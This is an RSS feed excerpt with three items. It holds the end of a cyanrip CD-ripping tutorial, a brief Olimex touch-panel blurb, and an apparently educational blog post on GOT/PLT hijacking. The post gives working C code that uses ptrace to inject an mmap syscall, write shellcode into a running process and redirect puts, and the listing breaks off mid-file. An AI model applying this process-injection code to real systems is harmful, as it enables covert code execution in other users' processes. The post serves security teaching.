Installation instructions for other distributions and FreeBSD can be found &lt;a href=&quot;https://github.com/cyanreg/cyanrip#installation&quot;&gt;on the GitHub page&lt;/a&gt;, and a Windows installer can be grabbed from the &lt;a href=&quot;https://github.com/cyanreg/cyanrip/releases&quot;&gt;releases&lt;/a&gt;.&lt;/p&gt;&lt;h2&gt;Determining the offset&lt;/h2&gt;&lt;p&gt;After installation, you need to find out the so-called offset value once. It depends on the drive and must always be specified when ripping.&lt;/p&gt;&lt;p&gt;To do this, I put an audio CD that is as popular as possible into the drive and enter the command&lt;/p&gt;&lt;pre&gt;&lt;code&gt;cyanrip -f&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;in the console. If the CD is known to the AccuRip database, you get output that begins roughly like this:&lt;/p&gt;&lt;pre&gt;&lt;code&gt;Searching for drive offset, enabling AccuRip and disabling MusicBrainz and Cover art fetching...
Checking /dev/cdrom for cdrom...
                CDROM sensed: HL-DT-ST DVDRAM GH24NSB0  LM01 SCSI CD-ROM


Opening drive...
Loading data for track 1...
Data loaded, searching for offsets...
Offset of +6 found in track 1, trying to confirm with another track
Loading data for track 2...
Data loaded, searching for offsets...
Offset of +6 confirmed (confidence: 2) in track 2, trying to confirm with another track&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;The important piece of information is “Offset of +6 found”. Once that has appeared three or four times, it can be considered confirmed, and you can abort the detection process (&lt;key&gt;Ctrl&lt;/key&gt; + &lt;key&gt;C&lt;/key&gt;).&lt;/p&gt;&lt;p&gt;So the offset value for my drive is 6; for your drive it may be different. Just memorize the offset value, stick it on the monitor on a Post-it next to the admin password, write it on the drive with a permanent marker, or have it tattooed on your calf: there are plenty of options. From here on, I give all commands with my offset value of 6.&lt;/p&gt;&lt;h2&gt;Identifying metadata&lt;/h2&gt;&lt;p&gt;For most CDs you can spare yourself entering metadata, that is, song and album titles, because the majority of commercial CDs are already in the community-maintained &lt;a href=&quot;https://musicbrainz.org/&quot;&gt;MusicBrainz database&lt;/a&gt;. However, the CD’s unique ID (DiscID) must be assigned to exactly one release in the MusicBrainz database. There are sometimes special cases and slightly different scenarios here.&lt;/p&gt;&lt;p&gt;We now enter the command&lt;/p&gt;&lt;pre&gt;&lt;code&gt;cyanrip -I&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;(capital i, not a lowercase L!) and look at the console output.&lt;/p&gt;&lt;h3&gt;Case 1: One release is assigned to the DiscID&lt;/h3&gt;&lt;p&gt;This will be the most common case. If the CD and the tracks are evidently recognized and, fairly near the start of the long (!) console output, there is something like …&lt;/p&gt;&lt;pre&gt;&lt;code&gt;Found MusicBrainz release: [name of the CD]&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;… that is great. 
It means nothing further needs to be done and we can jump straight to the “Ripping the CD” section below.&lt;/p&gt;&lt;h3&gt;Case 2: Several releases are assigned to the DiscID&lt;/h3&gt;&lt;p&gt;If the output looks roughly like this …&lt;/p&gt;&lt;pre&gt;&lt;code&gt;Multiple releases found in database for DiscID PmK_Kg1r_ND6zc1h51tErEbX2IM-:
    1 (ID: 712d55b2-9f62-4823-96d9-9e94efa88c07): Jelängerjelieber (DE) (2004)
    2 (ID: 82718613-f2c3-3f39-869d-a047f21e0041): Jelängerjelieber (ltd.) (DE) (2 CDs) (2005-06-13)&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;… then several CD variants were found. The first here is the regular album “Jelängerjelieber” by the band Klee; the second is a disc with identical content, but as part of a double CD. Often they are different country editions. In any case, I have the Klee album as a single CD, so I note the entry’s number in the list (1) or copy the ID (the long string beginning with 712d55b2).&lt;/p&gt;&lt;h3&gt;Case 3: The CD is not recognized&lt;/h3&gt;&lt;p&gt;Rather rarely, the console spits out something like this:&lt;/p&gt;&lt;pre&gt;&lt;code&gt;Unable to find release info for this CD, and metadata hasn&amp;#39;t been manually added!
Please help improve the MusicBrainz DB by submitting the disc info via the following URL:
[long URL]&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;This means the CD is not recognized right away. But even then, we can often still get around entering the metadata manually, because the CD in question is frequently present in the MusicBrainz database after all, just not assigned to this specific DiscID.&lt;/p&gt;&lt;p&gt;We open the URL shown in the console, either by clicking it while holding the &lt;key&gt;Ctrl&lt;/key&gt; key or by copy &amp;amp; paste. On the page that follows, we can search the catalog for releases and, if one exists, attach the CD to that release. (A free MusicBrainz account may be required for this.)&lt;/p&gt;&lt;p&gt;As soon as the CD is registered, you can carry on in the console as normal.&lt;/p&gt;&lt;p&gt;But what if the CD is unknown to MusicBrainz as well? Then you can add it as a new release. Sure, that is somewhat more laborious and time-consuming. But once it has been added, every other user can access the data in future and have these CDs ripped automatically. Since you benefit from the community’s groundwork on many other rips, I think it is fair to pitch in now and then.&lt;/p&gt;&lt;p&gt;If you do not feel like it, or it makes no sense anyway, for private recordings or mixtapes for example, you can of course skip it. In that case I simply rip without titles and add them afterwards with mp3tag; more on that later.&lt;/p&gt;&lt;h2&gt;Ripping the CD&lt;/h2&gt;&lt;p&gt;As things stand, the command for ripping looks like this:&lt;/p&gt;&lt;pre&gt;&lt;code&gt;cyanrip -s 6 -R 1 -T simple&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
&lt;li&gt;The &lt;code&gt;-s 6&lt;/code&gt; is the offset for my drive, see above.&lt;/li&gt;
&lt;li&gt;The &lt;code&gt;-R 1&lt;/code&gt; means that, when several results are found, the first CD variant in the list just determined is used for the metadata.&lt;/li&gt;
&lt;li&gt;The &lt;code&gt;-T simple&lt;/code&gt; means that exotic special characters are avoided in directory and file names. Otherwise there are problems on Windows systems.&lt;/li&gt;
&lt;/ul&gt;&lt;p&gt;By default, cyanrip rips to FLAC. That means you get files that are large, but losslessly compressed and therefore perfectly suited to archiving. If you would rather have smaller files, you can add the &lt;code&gt;-o&lt;/code&gt; parameter. With&lt;/p&gt;&lt;pre&gt;&lt;code&gt;cyanrip -s 6 -R 1 -T simple -o mp3 -b 256&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;you get MP3 files in near-CD quality at only a fraction of the file size. If you cannot decide,&lt;/p&gt;&lt;pre&gt;&lt;code&gt;cyanrip -s 6 -R 1 -T simple -o flac,mp3 -b 256&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;even gives you both, that is, FLAC and MP3 files. For this article I am continuing with FLAC, though, so I leave out the &lt;code&gt;-o&lt;/code&gt; parameter.&lt;/p&gt;&lt;p&gt;The ripped files normally end up in your home directory, in a subdirectory named &lt;code&gt;Album name [FLAC]&lt;/code&gt;. That is neither pretty nor tidy. Instead, you can tell cyanrip up front how you want directories and files to be named. Everyone has their own preferences. After some experimenting, I finally settled on this command:&lt;/p&gt;&lt;pre&gt;&lt;code&gt;cyanrip -s 6 -R 1 -T simple -D &amp;quot;CD-Rips/{album_artist}/{album_artist} - {album} ({date}){if #totaldiscs# &amp;gt; #1#/CD|disc|}&amp;quot; -F &amp;quot;{track}{if #artist# != #album_artist# - |artist|} - {title}&amp;quot;&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;That looks more complicated than it is. With this command I instruct cyanrip to rip the tracks into a subfolder &lt;code&gt;CD-Rips&lt;/code&gt;, following the scheme &lt;code&gt;/Artist/Artist - Album title (Year)/Track - Track title.flac&lt;/code&gt;. Two special cases are handled in addition:&lt;/p&gt;&lt;ul&gt;
&lt;li&gt;For CDs with various artists, or individual tracks with featured artists, the artists are additionally written into the file name.&lt;/li&gt;
&lt;li&gt;For double and multi-disc sets, a subfolder is created for each disc.&lt;/li&gt;
&lt;/ul&gt;&lt;div&gt;&lt;a href=&quot;https://i0.wp.com/frunc.de/wp-content/uploads/2026/06/cyanrip-konsole.png?ssl=1&quot;&gt;&lt;img src=&quot;https://i0.wp.com/frunc.de/wp-content/uploads/2026/06/cyanrip-konsole.png?resize=700%2C426&amp;amp;ssl=1&quot; alt=&quot;Screenshot: console output during a rip with cyanrip.&quot; title=&quot;&quot;/&gt;&lt;/a&gt;&lt;p&gt;Plain, but fast: once cyanrip gets going and the CD cooperates, its contents land on the hard drive quickly.&lt;/p&gt;&lt;/div&gt;&lt;p&gt;Once you have found “your” command and typed it into the console, the ripping begins. The duration varies with how scratched the CD is, the drive speed, and CPU power, but on a reasonably ordinary computer you can roughly expect ripping to run three to five times faster than the CD’s total playing time.&lt;/p&gt;&lt;h2&gt;Polishing metadata, adding cover art&lt;/h2&gt;&lt;p&gt;After ripping, I always run the tracks once more through &lt;a href=&quot;https://picard.musicbrainz.org/&quot;&gt;MusicBrainz Picard&lt;/a&gt;, a metadata enricher that is indispensable anyway, to fill in every last bit of missing metadata and add cover art.&lt;/p&gt;&lt;p&gt;In difficult cases, or when I have no metadata, I also edit the track data by hand. On Windows I always used &lt;a href=&quot;https://www.mp3tag.de/&quot;&gt;mp3tag&lt;/a&gt; for this. On Linux there is the similarly structured &lt;a href=&quot;https://docs.puddletag.net/download.html&quot;&gt;puddletag&lt;/a&gt;, which I somehow still do not get along with. Happily, mp3tag also runs quite usably on Linux under Wine.&lt;/p&gt;&lt;h3&gt;A tip on cover art&lt;/h3&gt;&lt;p&gt;Unfortunately, the cover images that cyanrip downloads automatically from the net are often rubbish. 
While tagging, I almost always swap them for my own scans or other images that can be found online.&lt;/p&gt;&lt;p&gt;A tip for getting excellent cover images: search for the album you want on YouTube Music (example: &lt;a href=&quot;https://music.youtube.com/playlist?list=OLAK5uy_mIR9MPZBqQgMhHBW5spUX2jw0Ky7zGOqI&quot;&gt;Klee – Jelängerjelieber&lt;/a&gt;), right-click the cover image → “Open image in new tab”, then adjust the &lt;a href=&quot;https://yt3.googleusercontent.com/FWKdXW7qTJ5i_FuLA1DW8-KhSJY4XCMW5kXiDjIuvOSv22UDONRLNnhn-aihkW5MnITJVsAEuCym72SZ=w544-h544-l90-rj&quot;&gt;URL of the image&lt;/a&gt;. At the very end of the image URL there is a parameter like &lt;code&gt;=w544-h544-l90-rj&lt;/code&gt;. You can change it to &lt;code&gt;=w8000&lt;/code&gt; to get a &lt;a href=&quot;https://yt3.googleusercontent.com/FWKdXW7qTJ5i_FuLA1DW8-KhSJY4XCMW5kXiDjIuvOSv22UDONRLNnhn-aihkW5MnITJVsAEuCym72SZ=w8000&quot;&gt;large version of the CD cover&lt;/a&gt;. I save that as &lt;code&gt;cover.jpg&lt;/code&gt; in the album folder and, possibly scaled down a little depending on the size of the image file, in the FLAC files.&lt;/p&gt;&lt;p&gt;Have fun archiving!&lt;/p&gt;&lt;ul&gt;
&lt;li&gt;04.06.2026: Erstveröffentlichung&lt;/li&gt;
&lt;li&gt;Update 07.06.2026: Verfeinerten Befehl hinzugefügt, der Mehrfach-CDs berücksichtigt.&lt;/li&gt;
&lt;li&gt;Update 08.06.2026: Verschiedene Szenarien für die Ermittlung des MusicBrainz-Releases hinzugefügt, Sanitize-Parameter und den Rest leicht überarbeitet.&lt;/li&gt;
&lt;/ul&gt;</content:encoded>
</item>
<item>
<title>Introducing the LCD7-PANEL-LIME2: A Ready-to-Mount Linux Touch Panel Computer</title>
<link>https://olimex.wordpress.com/2026/06/17/introducing-the-lcd7-panel-lime2-a-ready-to-mount-linux-touch-panel-computer/</link>
<guid isPermaLink="false">EFd7ycFglDyiW_HeKERPJzgw0ZabVdTPdOO17w==</guid>
<pubDate>Sat, 20 Jun 2026 13:49:14 +0000</pubDate>
<description>If you’ve ever needed a complete, industrial-grade touchscreen computer that you can simply bolt onto a panel and power up, the LCD7-PANEL-LIME2 is built exactly for that job. What it is The LCD7-PANEL-LIME2 is a fully assembled all-in-one unit that combines four things Olimex usually sells separately into a single, ready-to-deploy package: Everything arrives assembled, […]</description>
<content:encoded>If you’ve ever needed a complete, industrial-grade touchscreen computer that you can simply bolt onto a panel and power up, the LCD7-PANEL-LIME2 is built exactly for that job. What it is The LCD7-PANEL-LIME2 is a fully assembled all-in-one unit that combines four things Olimex usually sells separately into a single, ready-to-deploy package: Everything arrives assembled, […]</content:encoded>
</item>
<item>
<title>Linux hacking part 11: GOT/PLT hijacking. Simple C example. - cocomelonc</title>
<link>https://cocomelonc.github.io/linux/2026/06/17/linux-hacking-11.html</link>
<enclosure type="image/jpeg" length="0" url="https://cocomelonc.github.io/assets/images/206/2026-06-17_07-26.png"></enclosure>
<guid isPermaLink="false">FAH1RdXhzPV-oulmej0UMnWiltpex9Cp41d95A==</guid>
<pubDate>Sat, 20 Jun 2026 08:44:36 +0000</pubDate>
<description>﷽</description>
<content:encoded>&lt;p&gt;﷽&lt;/p&gt;&lt;p&gt;Hello, cybersecurity enthusiasts and white hackers!&lt;/p&gt;&lt;p&gt;&lt;img src=&quot;https://cocomelonc.github.io/assets/images/206/2026-06-17_07-26.png&quot; alt=&quot;malware&quot; title=&quot;&quot;/&gt;&lt;/p&gt;&lt;p&gt;This post is based on an exercise for my students and readers.&lt;/p&gt;&lt;p&gt;In the &lt;a href=&quot;https://cocomelonc.github.io/linux/2026/03/12/linux-hacking-10.html&quot;&gt;previous post&lt;/a&gt; we explored shared library injection via &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;LD_PRELOAD&lt;/code&gt;. Today we go one level deeper: instead of loading a new library, we surgically patch a pointer inside a running process to redirect one specific function call. No new files on disk, no &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;LD_PRELOAD&lt;/code&gt;, just a few bytes overwritten at the right address.&lt;/p&gt;&lt;h3&gt;concept&lt;/h3&gt;&lt;p&gt;When a Linux binary calls an external function like &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;puts&lt;/code&gt;, the call does not go directly to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;libc&lt;/code&gt;. Instead it passes through two structures baked into the ELF binary itself.&lt;/p&gt;&lt;p&gt;&lt;em&gt;PLT (Procedure Linkage Table):&lt;/em&gt; a small table of stubs in the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.plt&lt;/code&gt; section. With classic lazy binding on x86-64, each stub is three instructions: an indirect &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;jmp&lt;/code&gt; through the function's GOT entry, a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;push&lt;/code&gt; of the relocation index, and a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;jmp&lt;/code&gt; to the resolver stub at the start of the PLT.&lt;/p&gt;&lt;p&gt;&lt;em&gt;GOT (Global Offset Table):&lt;/em&gt; a writable array of pointers in &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.got.plt&lt;/code&gt;. 
Before the first call to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;puts&lt;/code&gt;, the GOT entry points back into the PLT (to the stub's &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;push&lt;/code&gt; instruction). On the &lt;em&gt;first&lt;/em&gt; call the dynamic linker resolves the real libc address and writes it into the GOT. Every subsequent call skips the resolver and jumps straight to libc. This is called &lt;em&gt;lazy binding&lt;/em&gt;.&lt;/p&gt;&lt;h3&gt;practical example&lt;/h3&gt;&lt;p&gt;The attack surface is obvious: the GOT is a writable table of function pointers. If we overwrite the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;puts&lt;/code&gt; entry with our own address, every future call to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;puts&lt;/code&gt; in the victim will land in our code instead of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;libc&lt;/code&gt;.&lt;/p&gt;&lt;p&gt;The technique in four steps:&lt;/p&gt;&lt;ol&gt;&lt;li&gt;Attach to the victim with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ptrace&lt;/code&gt; so we can read and write its memory.&lt;/li&gt;
&lt;li&gt;Parse the victim’s ELF binary to locate the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;puts&lt;/code&gt; entry in &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.got.plt&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Inject an &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;mmap&lt;/code&gt; syscall into the victim to allocate a page of executable memory, then write our hook shellcode there.&lt;/li&gt;
&lt;li&gt;Overwrite the GOT entry with the address of the shellcode and detach.&lt;/li&gt;&lt;/ol&gt;&lt;p&gt;Let’s start with the victim. It is intentionally minimal: it just announces its &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;PID&lt;/code&gt; and prints &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;&amp;quot;meow&amp;quot;&lt;/code&gt; in a loop so we can clearly see the moment the hook takes effect (&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;meow.c&lt;/code&gt;):&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;/*
 * meow.c
 * simple target process for GOT/PLT hijacking demo
 * author: @cocomelonc
 * https://cocomelonc.github.io/linux/2026/06/17/linux-hacking-11.html
 */
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

int main(void) {
  printf(&amp;quot;victim pid: %d\n&amp;quot;, getpid());
  while (1) {
    puts(&amp;quot;meow&amp;quot;);
    sleep(2);
  }
  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Now the interesting part. Let me walk through &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;hack.c&lt;/code&gt; (our hijacker) section by section.&lt;/p&gt;&lt;p&gt;First, the &lt;em&gt;hook shellcode&lt;/em&gt;. Our hook replaces &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;puts&lt;/code&gt; entirely: it calls &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;write(1, &amp;quot;[HOOKED] meow\n&amp;quot;, 14)&lt;/code&gt; directly via syscall (avoiding &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;libc&lt;/code&gt;) and then returns to the caller. The 14-byte string is appended after the final &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ret&lt;/code&gt;, at offset 0x1f, and is addressed with a RIP-relative &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;lea&lt;/code&gt;. That instruction starts at offset 0x0e and is 7 bytes long, so RIP is 0x15 when the displacement is applied, which gives a displacement of 0x1f - 0x15 = 0x0a.&lt;/p&gt;&lt;p&gt;As a C byte array:&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;static unsigned char hook_sc[] = {
  0x48, 0xc7, 0xc0, 0x01, 0x00, 0x00, 0x00,     /* mov rax, 1            */
  0x48, 0xc7, 0xc7, 0x01, 0x00, 0x00, 0x00,     /* mov rdi, 1            */
  0x48, 0x8d, 0x35, 0x0a, 0x00, 0x00, 0x00,     /* lea rsi, [rip+0x0a]   */
  0x48, 0xc7, 0xc2, 0x0e, 0x00, 0x00, 0x00,     /* mov rdx, 14           */
  0x0f, 0x05,                                   /* syscall               */
  0xc3,                                         /* ret                   */
  &amp;#39;[&amp;#39;,&amp;#39;H&amp;#39;,&amp;#39;O&amp;#39;,&amp;#39;O&amp;#39;,&amp;#39;K&amp;#39;,&amp;#39;E&amp;#39;,&amp;#39;D&amp;#39;,&amp;#39;]&amp;#39;,&amp;#39; &amp;#39;,&amp;#39;m&amp;#39;,&amp;#39;e&amp;#39;,&amp;#39;o&amp;#39;,&amp;#39;w&amp;#39;,&amp;#39;\n&amp;#39;
};&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Next, &lt;em&gt;writing to victim memory&lt;/em&gt; - we need a helper that writes an arbitrary byte buffer into the victim’s address space in 8-byte chunks using &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;PTRACE_POKEDATA&lt;/code&gt;. The last chunk (if the buffer is not a multiple of 8) uses a read-modify-write to avoid corrupting adjacent bytes:&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;static void poke_bytes(pid_t pid, uint64_t addr, void *data, size_t len) {
  size_t i;
  for (i = 0; i + 8 &amp;lt;= len; i += 8) {
    uint64_t word;
    memcpy(&amp;amp;word, (uint8_t *)data + i, 8);
    ptrace(PTRACE_POKEDATA, pid, addr + i, word);
  }
  if (i &amp;lt; len) {
    uint64_t word = ptrace(PTRACE_PEEKDATA, pid, addr + i, NULL);
    memcpy(&amp;amp;word, (uint8_t *)data + i, len - i);
    ptrace(PTRACE_POKEDATA, pid, addr + i, word);
  }
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;The next step is &lt;em&gt;syscall injection&lt;/em&gt;: we need to allocate a page of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;PROT_READ|PROT_WRITE|PROT_EXEC&lt;/code&gt; memory inside the victim. The trick: save the victim’s registers and the 8-byte word at &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;RIP&lt;/code&gt;, overwrite the first two bytes of that word with the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;syscall&lt;/code&gt; opcode (&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;0x0f 0x05&lt;/code&gt;), set the registers to describe an &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;mmap&lt;/code&gt; call (syscall number 9 in RAX, arguments in RDI, RSI, RDX, R10, R8, and R9), single-step one instruction, then read &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;RAX&lt;/code&gt; for the returned address and restore everything:&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;static uint64_t inject_mmap(pid_t pid) {
  struct user_regs_struct regs, saved;
  uint64_t saved_instr;

  ptrace(PTRACE_GETREGS, pid, NULL, &amp;amp;saved);
  regs = saved;

  // save the 8 bytes at RIP and patch the first two to `syscall`
  saved_instr = ptrace(PTRACE_PEEKTEXT, pid, saved.rip, NULL);
  ptrace(PTRACE_POKETEXT, pid, saved.rip,
    (saved_instr &amp;amp; ~(uint64_t)0xffff) | 0x050f);

  // mmap(NULL, 4096, PROT_RWX, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0)
  regs.rax = 9;            /* SYS_mmap                  */
  regs.rdi = 0;            /* addr   = NULL             */
  regs.rsi = 4096;         /* length = 4096             */
  regs.rdx = 7;            /* PROT_READ|PROT_WRITE|PROT_EXEC */
  regs.r10 = 0x22;         /* MAP_PRIVATE|MAP_ANONYMOUS */
  regs.r8  = (uint64_t)-1; /* fd     = -1               */
  regs.r9  = 0;            /* offset = 0                */
  ptrace(PTRACE_SETREGS, pid, NULL, &amp;amp;regs);

  ptrace(PTRACE_SINGLESTEP, pid, NULL, NULL);
  waitpid(pid, NULL, 0);

  ptrace(PTRACE_GETREGS, pid, NULL, &amp;amp;regs);
  uint64_t page = regs.rax;

  // restore original instruction and register state
  ptrace(PTRACE_POKETEXT, pid, saved.rip, saved_instr);
  ptrace(PTRACE_SETREGS, pid, NULL, &amp;amp;saved);

  return page;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Because the registers and the original instruction are restored, the victim will later resume exactly where it was, as if nothing happened, except that there is now a new anonymous page in its address space, ready to receive our shellcode.&lt;/p&gt;&lt;p&gt;Next, &lt;em&gt;finding &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;puts@got&lt;/code&gt;&lt;/em&gt;: we open &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/proc/&amp;lt;pid&amp;gt;/exe&lt;/code&gt; (a link to the victim's ELF file on disk), read it into a buffer, then walk the section headers looking for &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.rela.plt&lt;/code&gt;, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.dynsym&lt;/code&gt;, and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.dynstr&lt;/code&gt;. Each entry in &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.rela.plt&lt;/code&gt; pairs a GOT slot address (&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;r_offset&lt;/code&gt;) with a dynamic symbol index (packed into &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;r_info&lt;/code&gt;). We match the symbol name &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;&amp;quot;puts&amp;quot;&lt;/code&gt; and return &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;r_offset&lt;/code&gt;. For a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-no-pie&lt;/code&gt; binary this is the absolute virtual address; for a PIE binary the load base would have to be added:&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;static uint64_t find_puts_got(pid_t pid) {
  char path[64];
  snprintf(path, sizeof(path), &amp;quot;/proc/%d/exe&amp;quot;, pid);
  int fd = open(path, O_RDONLY);
  if (fd &amp;lt; 0) { perror(&amp;quot;open exe&amp;quot;); return 0; }

  uint8_t *buf = NULL;
  size_t sz = 0;
  uint8_t tmp[4096];
  ssize_t n;
  while ((n = read(fd, tmp, sizeof(tmp))) &amp;gt; 0) {
    buf = realloc(buf, sz + n);
    memcpy(buf + sz, tmp, n);
    sz += n;
  }
  close(fd);

  Elf64_Ehdr *ehdr   = (Elf64_Ehdr *)buf;
  Elf64_Shdr *shdrs  = (Elf64_Shdr *)(buf + ehdr-&amp;gt;e_shoff);
  char *shstrtab     = (char *)(buf + shdrs[ehdr-&amp;gt;e_shstrndx].sh_offset);

  Elf64_Shdr *rela_plt = NULL, *dynsym_s = NULL, *dynstr_s = NULL;
  for (int i = 0; i &amp;lt; ehdr-&amp;gt;e_shnum; i++) {
    char *name = shstrtab + shdrs[i].sh_name;
    if (!strcmp(name, &amp;quot;.rela.plt&amp;quot;)) rela_plt = &amp;amp;shdrs[i];
    if (!strcmp(name, &amp;quot;.dynsym&amp;quot;))   dynsym_s  = &amp;amp;shdrs[i];
    if (!strcmp(name, &amp;quot;.dynstr&amp;quot;))   dynstr_s  = &amp;amp;shdrs[i];
  }

  if (!rela_plt || !dynsym_s || !dynstr_s) {
    fprintf(stderr, &amp;quot;required ELF sections not found\n&amp;quot;);
    free(buf); return 0;
  }

  Elf64_Rela *relas  = (Elf64_Rela *)(buf + rela_plt-&amp;gt;sh_offset);
  int         count  = rela_plt-&amp;gt;sh_size / sizeof(Elf64_Rela);
  Elf64_Sym  *syms   = (Elf64_Sym  *)(buf + dynsym_s-&amp;gt;sh_offset);
  char       *strtab = (char       *)(buf + dynstr_s-&amp;gt;sh_offset);

  uint64_t addr = 0;
  for (int i = 0; i &amp;lt; count; i++) {
    uint32_t idx = ELF64_R_SYM(relas[i].r_info);
    if (!strcmp(strtab + syms[idx].st_name, &amp;quot;puts&amp;quot;)) {
      addr = relas[i].r_offset;
      break;
    }
  }

  free(buf);
  return addr;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Finally, &lt;em&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;main&lt;/code&gt; puts it all together&lt;/em&gt;: attach, find the GOT entry, inject the mmap call, write the shellcode, overwrite the GOT entry, and detach:&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;int main(int argc, char *argv[]) {
  if (argc &amp;lt; 2) {
    fprintf(stderr, &amp;quot;usage: %s &amp;lt;pid&amp;gt;\n&amp;quot;, argv[0]);
    return 1;
  }
  pid_t pid = (pid_t)atoi(argv[1]);

  printf(&amp;quot;attaching to pid %d...\n&amp;quot;, pid);
  if (ptrace(PTRACE_ATTACH, pid, NULL, NULL) &amp;lt; 0) {
    perror(&amp;quot;ptrace attach&amp;quot;); return 1;
  }
  waitpid(pid, NULL, 0);
  printf(&amp;quot;attached\n&amp;quot;);

  uint64_t got_puts = find_puts_got(pid);
  if (!got_puts) {
    fprintf(stderr, &amp;quot;puts@got not found\n&amp;quot;);
    ptrace(PTRACE_DETACH, pid, NULL, NULL); return 1;
  }
  printf(&amp;quot;puts@got: 0x%lx\n&amp;quot;, got_puts);

  printf(&amp;quot;injecting mmap syscall...\n&amp;quot;);
  uint64_t page = inject_mmap(pid);
  if ((int64_t)page &amp;lt; 0) {
    fprintf(stderr, &amp;quot;mmap failed\n&amp;quot;);
    ptrace(PTRACE_DETACH, pid, NULL, NULL); return 1;
  }
  printf(&amp;quot;rwx page allocated: 0x%lx\n&amp;quot;, page);

  printf(&amp;quot;writing hook shellcode...\n&amp;quot;);
  poke_bytes(pid, page, hook_sc, sizeof(hook_sc));
  printf(&amp;quot;%zu bytes written\n&amp;quot;, sizeof(hook_sc));

  printf(&amp;quot;overwriting puts@got...\n&amp;quot;);
  ptrace(PTRACE_POKEDATA, pid, got_puts, page);
  printf(&amp;quot;puts@got -&amp;gt; 0x%lx\n&amp;quot;, page);

  ptrace(PTRACE_DETACH, pid, NULL, NULL);
  printf(&amp;quot;detached. victim is now hooked!\n&amp;quot;);
  return 0;
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Full source code of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;meow.c&lt;/code&gt;:&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;/*
 * meow.c
 * simple target process for GOT/PLT hijacking demo
 * author: @cocomelonc
 * https://cocomelonc.github.io/linux/2026/06/17/linux-hacking-11.html
 */
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;unistd.h&amp;gt;

int main(void) {
  printf(&amp;quot;victim pid: %d\n&amp;quot;, getpid());
  while (1) {
    puts(&amp;quot;meow&amp;quot;);
    sleep(2);
  }
  return 0;
